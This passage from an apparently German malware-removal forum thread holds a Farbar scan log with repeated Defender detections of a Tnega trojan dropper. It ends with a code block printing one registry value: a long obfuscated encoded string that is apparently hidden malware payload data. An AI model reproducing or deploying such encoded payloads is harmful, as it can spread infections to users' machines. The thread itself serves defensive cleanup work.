Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [2020-12-18] (HP Inc.) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa [2020-11-22] (Apple Inc.) [Startup Task] March of Empires: War of Lords -> C:\Program Files\WindowsApps\A278AB0D.MarchofEmpires_5.3.0.5_x86__h6adky7gbf63m [2020-12-16] (Gameloft SE) Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-03-01] (Microsoft Corporation) Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe [2020-09-26] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-10-26] (Microsoft Studios) [MS Ad] Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_20.11116.5523.0_x64__8wekyb3d8bbwe [2021-01-06] (Microsoft Corporation) Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios) Synaptics TouchPad -> C:\Program Files\WindowsApps\SynapticsIncorporated.SynHPConsumerDApp_19005.35054.0.0_x64__807d65c4rvak2 [2020-03-14] (Synaptics Incorporated) WEB.DE MailCheck -> C:\Program Files\WindowsApps\4659BB81.WEB.DEMailCheck_4.5.7.0_neutral__9r8rjdwa12808 [2019-07-02] (1&1 Mail & Media GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ContextMenuHandlers1: [PicaViewCtxMenuShlExt] -> {F3CBBA61-EE3F-4D6D-B1C6-B3474E579936} => C:\Program Files\Common Files\ACD Systems\PicaView\ACDSeePV.dll [2019-09-23] (ACD Systems International Inc. -> ACD Systems International Inc.) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-01-07] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\ki125049.inf_amd64_77ae5ee10f2a986a\igfxDTCM.dll [2017-10-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-01-07] (Malwarebytes Corporation -> Malwarebytes) ==================== Codecs (Nicht auf der Ausnahmeliste) ==================== ==================== Verknüpfungen & WMI ======================== ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============= ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ======== ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ================= ==================== Internet Explorer (Nicht auf der Ausnahmeliste) ========== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp17win10.msn.com/?pc=HCTE HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp17win10.msn.com/?pc=HCTE HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp17win10.msn.com/?pc=HCTE HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp17win10.msn.com/?pc=HCTE HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp17win10.msn.com/?pc=HCTE BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation) ==================== Hosts Inhalt: ========================= (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2016-07-16 12:47 - 2021-01-07 19:59 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts 127.0.0.1 localhost ==================== Andere Bereiche =========================== (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\ Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\ HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img1.jpg DNS Servers: 192.168.178.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) HKLM\...\StartupApproved\Run: => "ACPW10DE" HKLM\...\StartupApproved\Run: => "ACPW11DE" HKLM\...\StartupApproved\Run: => "VCVS04DE" HKLM\...\StartupApproved\Run: => "ACUW13DE" HKLM\...\StartupApproved\Run32: => "CanonQuickMenu" HKLM\...\StartupApproved\Run32: => "PDFPrint" HKLM\...\StartupApproved\Run32: => "VIDCP5DE" HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\StartupApproved\StartupFolder: => "An OneNote senden.lnk" HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\StartupApproved\Run: => "ACDSeeCommanderPro10" HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\StartupApproved\Run: => "ACDSeeCommanderPro11" HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\StartupApproved\Run: => "ACDSeeCommanderUltimate13" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= 30-12-2020 21:45:21 Geplanter Prüfpunkt 03-01-2021 18:05:09 Garmin Express 04-01-2021 20:33:25 Windows Modules Installer 05-01-2021 21:36:22 AdwCleaner_BeforeCleaning_05/01/2021_21:36:21 06-01-2021 17:29:37 AdwCleaner_BeforeCleaning_06/01/2021_17:29:36 ==================== Fehlerhafte Geräte im Gerätemanager ============ ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (01/07/2021 08:00:33 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (01/07/2021 08:00:33 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Error: (01/07/2021 08:00:33 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (01/07/2021 08:00:33 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Error: (01/06/2021 05:30:08 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (01/06/2021 05:30:08 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Error: (01/06/2021 05:30:08 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (01/06/2021 05:30:08 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Systemfehler: ============= Error: (01/07/2021 08:00:34 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT) Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet. Modulpfad: C:\WINDOWS\system32\IntelIHVRouter06.dll Error: (01/07/2021 08:00:34 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT) Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet. Modulpfad: C:\WINDOWS\system32\IntelIHVRouter06.dll Error: (01/07/2021 08:00:32 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT) Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet. Modulpfad: C:\WINDOWS\system32\IntelIHVRouter06.dll Error: (01/07/2021 07:59:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "HPWMISVC" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (01/07/2021 07:59:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "HP Support Solutions Framework Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (01/07/2021 07:59:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts. Error: (01/07/2021 07:59:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Presentation Foundation-Schriftartcache 3.0.0.0" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts. Error: (01/07/2021 07:59:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Windows Defender: =================================== Date: 2021-01-07 16:38:04.1250000Z Description: Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt. Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0 Name: TrojanDropper:Win64/Tnega!MSR ID: 2147771646 Schweregrad: Schwerwiegend Kategorie: Trojaner - Dropper Pfad: file:_C:\Users\uneut\AppData\Local\Temp\GetX64BTIT.exe Erkennungsursprung: Lokaler Computer Erkennungstype: Konkret Erkennungsquelle: Echtzeitschutz Benutzer: DESKTOP-SU91660\uneut Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Sicherheitsversion: AV: 1.329.1761.0, AS: 1.329.1761.0, NIS: 1.329.1761.0 Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4 Date: 2021-01-06 19:48:56.0740000Z Description: Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt. Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0 Name: TrojanDropper:Win64/Tnega!MSR ID: 2147771646 Schweregrad: Schwerwiegend Kategorie: Trojaner - Dropper Pfad: file:_C:\Users\uneut\AppData\Local\Temp\GetX64BTIT.exe Erkennungsursprung: Lokaler Computer Erkennungstype: Konkret Erkennungsquelle: Echtzeitschutz Benutzer: DESKTOP-SU91660\uneut Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Sicherheitsversion: AV: 1.329.1761.0, AS: 1.329.1761.0, NIS: 1.329.1761.0 Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4 Date: 2021-01-06 17:31:11.5690000Z Description: Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt. Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0 Name: TrojanDropper:Win64/Tnega!MSR ID: 2147771646 Schweregrad: Schwerwiegend Kategorie: Trojaner - Dropper Pfad: file:_C:\Users\uneut\AppData\Local\Temp\GetX64BTIT.exe Erkennungsursprung: Lokaler Computer Erkennungstype: Konkret Erkennungsquelle: Echtzeitschutz Benutzer: DESKTOP-SU91660\uneut Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Sicherheitsversion: AV: 1.329.1761.0, AS: 1.329.1761.0, NIS: 1.329.1761.0 Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4 Date: 2021-01-06 17:04:37.6290000Z Description: Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt. Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0 Name: TrojanDropper:Win64/Tnega!MSR ID: 2147771646 Schweregrad: Schwerwiegend Kategorie: Trojaner - Dropper Pfad: file:_C:\Users\uneut\AppData\Local\Temp\GetX64BTIT.exe Erkennungsursprung: Lokaler Computer Erkennungstype: Konkret Erkennungsquelle: Echtzeitschutz Benutzer: DESKTOP-SU91660\uneut Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Sicherheitsversion: AV: 1.329.1700.0, AS: 1.329.1700.0, NIS: 1.329.1700.0 Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4 Date: 2021-01-05 21:51:31.2600000Z Description: Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt. Weitere Informationen: https://go.microsoft.com/fwlink/?linkid=37020&name=App:Chip_Updater_BundleInstaller&threatid=268628&enterprise=0 Name: App:Chip_Updater_BundleInstaller ID: 268628 Schweregrad: Niedrig Kategorie: Potenziell unerwünschte Software Pfad: file:_C:\Users\uneut\Downloads\Malwarebytes Malware Scanner - CHIP-Installer.exe; webfile:_C:\Users\uneut\Downloads\Malwarebytes Malware Scanner - CHIP-Installer.exe|https://www.chip.de/securedownload/?lastchange=101220200856&pid=chipderedesign&cid=54423242&euid=e4e1bfafbf10b3f5daf8f864&browser=edge&ref=&tid=39009&tpathid=9223_9232_38913_39009&os=wi ndows&tname=anti-spyware&ico=&proto=https://&source=BLUB2&v=oct2015|pid:10780,ProcessStart:132543534801389624 Erkennungsursprung: Internet Erkennungstype: Konkret Erkennungsquelle: Downloads und Anlagen Benutzer: DESKTOP-SU91660\uneut Prozessname: C:\Windows\System32\svchost.exe Sicherheitsversion: AV: 1.329.1700.0, AS: 1.329.1700.0, NIS: 1.329.1700.0 Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4 Date: 2021-01-03 12:18:27.0320000Z Description: Fehler von Microsoft Defender Antivirus beim Herunterladen und Konfigurieren von Microsoft Defender Offline. Fehlercode: 0x8000000a Fehlerbeschreibung: Die für diesen Vorgang erforderlichen Daten sind noch nicht verfügbar. Date: 2021-01-03 12:18:00.3110000Z Description: Fehler von Microsoft Defender Antivirus beim Herunterladen und Konfigurieren von Microsoft Defender Offline. Fehlercode: 0x8000000a Fehlerbeschreibung: Die für diesen Vorgang erforderlichen Daten sind noch nicht verfügbar. Date: 2020-10-09 19:41:47.2870000Z Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.325.462.0 Update Source: Microsoft Center zum Schutz vor Schadsoftware Sicherheitstyp: AntiVirus Updatetyp: Voll Benutzer: NT-AUTORITÄT\Netzwerkdienst Aktuelle Modulversion: %Vorherige Modulversion: 1.1.17500.4 Fehlercode: 0x8050a003 Fehlerbeschreibung: Dieses Paket enthält keine aktuellen Definitionsdateien für das Programm. Weitere Informationen finden Sie in "Hilfe und Support". Date: 2020-10-09 19:41:47.2860000Z Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.325.462.0 Update Source: Microsoft Center zum Schutz vor Schadsoftware Sicherheitstyp: AntiSpyware Updatetyp: Voll Benutzer: NT-AUTORITÄT\Netzwerkdienst Aktuelle Modulversion: %Vorherige Modulversion: 1.1.17500.4 Fehlercode: 0x8050a003 Fehlerbeschreibung: Dieses Paket enthält keine aktuellen Definitionsdateien für das Programm. Weitere Informationen finden Sie in "Hilfe und Support". Date: 2020-10-09 19:41:47.2860000Z Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.325.462.0 Update Source: Microsoft Center zum Schutz vor Schadsoftware Sicherheitstyp: AntiVirus Updatetyp: Voll Benutzer: NT-AUTORITÄT\Netzwerkdienst Aktuelle Modulversion: %Vorherige Modulversion: 1.1.17500.4 Fehlercode: 0x8050a003 Fehlerbeschreibung: Dieses Paket enthält keine aktuellen Definitionsdateien für das Programm. Weitere Informationen finden Sie in "Hilfe und Support". ==================== Speicherinformationen =========================== BIOS: American Megatrends Inc. F.51 06/19/2020 Hauptplatine: HP 827E Prozessor: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16265.23 MB Verfügbarer physikalischer RAM: 13062 MB Summe virtueller Speicher: 18697.23 MB Verfügbarer virtueller Speicher: 15613.19 MB ==================== Laufwerke ================================ Drive c: (Windows) (Fixed) (Total:933.24 GB) (Free:542.06 GB) NTFS Drive d: (RECOVERY) (Fixed) (Total:11.39 GB) (Free:1.19 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)] \\?\Volume{356c05b3-9ea7-42b3-a49d-c77f1e517a0b}\ () (Fixed) (Total:0 GB) (Free:0 GB) \\?\Volume{95fc8de9-6e1b-40c2-ab23-8b16e2a69ebd}\ (Windows RE tools) (Fixed) (Total:0.96 GB) (Free:0.31 GB) NTFS \\?\Volume{8109df00-6abb-4e5a-825c-350dafbde383}\ () (Fixed) (Total:0.25 GB) (Free:0.17 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Size: 953.9 GB) (Disk ID: BC368E89) Partition: GPT. ==================== Ende von Addition.txt ======================= Ich hoffe ich habe bis hier alles richtig gemacht. |
Ja, du hast alles richtig gemacht. :) Wir machen gleich weiter. Schritt 1
Schritt 2
Schritt 3
Bitte poste mit deiner nächsten Antwort:
|
ich habe gestern Abend geantwortet. Leider ist diese hier nicht zu sehen, ich versuche es jetzt noch einmal. Code: Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021 |
Code: 9 REG_SZ vvtrvvtqtqtqtqtovvtuvvtqiwvvtpvvtwvvtovvitvvtqtpvvtwvvtyvvtqiwvvtovvtovvtqtqtqtqtovvtyvvtwvviivvtyvvtqttvvirvvitvvtivvtovvtrvvitvvtsvvtpvvirvvtyvvtuvviivvtpvviivviivvtovvtqttvvtpvviivviivvtovvtovvtqitvviuvvtpvvitvvtovvtqtyvvtqtqtqtqtuvvtsvvitvvtivvtqtovvtqtwvvtuvvtsvvtuvviuvvtuvvirvvtuvviivvtpvvirvviuvvtuvvtuvviyvvitvvttvvtpvvtuvviyvvtrvvtovvtyvviuvvtrvvtivviwvvtqtrvviuvvtpvviyvvtpvviivvirvviivviivviivviivvtpvvirvviivvtqtuvvtivviivviivvtovvtuvvtqtpvviivviivvtovvtuvviivvitvviuvvtpvvtqtsvvtqtrvvtqtqtqtqtuvvtivvtpvvtsvvtyvvtuvvtqtpvviuvvtpvvirvvitvviivvirvviivviivviivviivvtpvvirvvtyvviyvvtqtpvvtpvvttvvitvvtyvvtwvvtyvvtpvvtuvvitvvtsvvtovvtyvvtwvvtqttvvtsvvtuvvtsvvtqitvvtovvtyvvtqirvvttvvtsvvtuvvtsvvtwvvtqtovvtyvvtqtivvtpvvirvvtuvviivvtqitvvtqttvvtuvvtsvvtqitvvtpvvirvvtyvvtovvtqitvviwvvttvvtyvvtyvvttvviuvvtyvvtuvvtqtqiivviivvtovvtwvvtwvvtqtuvvttvviivviivvtovvtuvviivvtyvvtuvvtovviuvvtpvvtovvtsvvtqtrvvtqtqtqtqtpvvttvvitvvtyvvtwvvtqiuvvirvviwvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtqitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtpvvtqttvviuvvtqtqtqiivvtpvvtuvvtsvvtuvvtqtqtqtqtqtqtpvviyvvtyvvtuvviivvtyvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqtpvviyvvtyvvtuvviivvtpvvtuvvtqiivviivvtovvtivvtqitvviuvvtpvvtivviuvvtqrtvvtqtpvvirvvtyvvtuvviivvitvvtpvvttvvitvvtyvvtwvvtqtpvvirvvtyvviuvvtqitvvtpvvirvviyvvtwvvtrvvirvvtuvvtqtwvvitvvtpvvtsvvtuvvtuvviivvtyvvtovvtyvvtivviuvvtpvvirvvtpvvtqtpvvtpvvtqtqtqtqtqtqtpvvtuvvitvvtqtovvtyvvtivvtyvvtuvvttvvtqttvvitvvtpvvtuvvtovvtpvviyvvtovvtsvvtqtyvvttvvttvviyvvirvvtpvvirvvtqtovvtpvviyvvtuvvtwvvtqtpvvtpvvttvviuvvtpvvtqtpvvtpvvtsvvtuvvtuvviivvitvviwvvtsvviivviuvviivviivviivviivviivviivvtovvtivvtyvvtqtqiivvirvvtovvtwvvtrvvtpvvirvvitvvtrvvitvvtovvtyvvtuvviivvtpvvtqtqttvvtqtqtqtqtqtrvvtuvvtqtqiivvtqtqtqtqtqtivvtivvttvvirvvtyvvtuvviivvtpvvtovvtuvvtwvvtyvvtpvvirvvtqtwvvtpvvtwvviuvvtrvviivviivvtqiivvtqtqtqtqtqttvvtuvvtivvtqitvvtpvvirvvtovvtuvviivvtyvvtqtwvvttvvtyvvtqtrvvtpvvirvvtovvtuvvtqtpvvtpvvirvvtqtovvtyvvttvvtpvvirvvtuvvtuvviivvitvvtpvvttvviuvvtpvvtqtpvvtpvvttvvitvvtrvvtqtrvviyvvtwvviuvvtpvvtpvvtsvvtuvvtuvviivvitvvttvvirvviyvvtpvvtovvtrvvitvvtqtqttvvtqiivvtpvvttvvttvvtsvvtqtqtovvtuvviwvvtrvvtuvviivvtuvvirvvtuvviuvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtwvvtyvvtpvvirvvtyvviyvvtqtpvvtuvvttvvtuvvtivvtuvvtovvtpvvirvvtuvvtwvvttvvitvvtpvvirvvtyvvtyvvtqiwvvtovvitvvtpvvtsvvtyvvtuvviuvvitvvtpvvtuvvitvvtqtqiivvtpvvtyvvtpvvitvvtqtqtqtqtqtqtpvvirvvtuvvtyvvtqiwvvtovvtpvvtpvvtuvviyvvtrvvtqiivvtpvvtyvvtpvvtqtqtqtqtqtqtqtpvvirvvtyvvtyvvtqiwvvtrvvtqtpvvirvvtovvtuvvtqitvvtqttvvitvvtwvvtpvvirvvtuvvitvvtqiwvvtwvvitvvtpvvtsvvtyvvtuvviivvtpvvtqttvviyvvtsvvtpvvirvvtyvvtyvvtqiwvvtrvvtyvvtqttvvitvvtwvvtpvvtsvvtuvviyvviivvtqtpvvtsvvtyvvtuvviivvtyvvtpvvirvvitvvtivvitvvtwvviuvvtpvvtwvvtqtivvtivvtpvvtuvvitvvtqtovvtuvvtqtivvtrvvirvvtovvtyvvtqiwvvtwvvtqiuvvirvvtivvtuvvttvvttvviivviivvttvvtsvvtovvitvvtqiwvvtwvvtpvvtovvtivvtyvviwvvtpvvirvvtyvvtuvviivvtpvvtpvvirvviyvviuvvtpvvirvvtqtyvvirvvtpvvtqttvvitvvtwvvtpvviwvvtqtpvvttvviwvvtqirvvtpvvtpvvtyvviyvviivviivvtpvvirvvtyvviyvvtqtpvvtovvtuvvtrvvtyvvtpvvtqtovviyvviivviivvtqtqtovvtyvvtwvviwvvtpvviwvvtyvvtpvvtqtwvvttvviwvvtyvvirvvtqtwvvtpvvtpvvtyvviyvviivviivvtpvvirvvtyvviyvvtqtpvvtovvtuvvtwvvtqtpvvttvvitvvtqtqtrvvtpvvttvvitvvttvvtqtrvvtpvvtqtovviyvviivviivvtqtqtovvtuvviyvvtyvvttvvttvvitvvtqiuvvirvvtqtuvvtwvvirvvitvvtqtpvvttvvitvvtpvvtqtwvvtpvvtuvvitvvtqtovvtyvvtwvvtqtyvvtovvttvvirvvtovvitvvtqiwvvtwvvtpvvtovvtrvvirvvtivvttvvttvvitvvtqtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtpvvirvvtyvvtuvviivvtyvvtpvvirvvtuvviyvviivvtqtqiivvirvvtovvttvvtyvvtovvtpvvtpvvttvviivviuvviivviivvtovvtyvviuvvtpvvtpvvirvvtovviyvvtwvvtqtpvvtuvviivviivvtovvtyvvtwvvtpvvttvvtsvvtwvvtyvvirvvttvvtovvtrvvtqiivvtpvvirvvtyvvtuvviuvvitvvtqttvvitvvtrvvttvvtsvvtqtyvvirvvttvvtovvtovvtqtuvvttvvttvvitvvtqtyvvtqiuvvirvvtqtrvvttvvtrvvitvvtqtpvvtpvvtqtovvtpvvirvvtqtyvvirvvttvvtqttvvitvvtwvviuvvirvvitvvtyvvtuvvtuvvtpvvirvviuvvitvvtpvvirvvtyvvtuvvtqtpvvtpvvirvvtuvvtuvvtqitvvtpvvirvvtyvvtpvvttvvitvvtqttvvitvvtp |
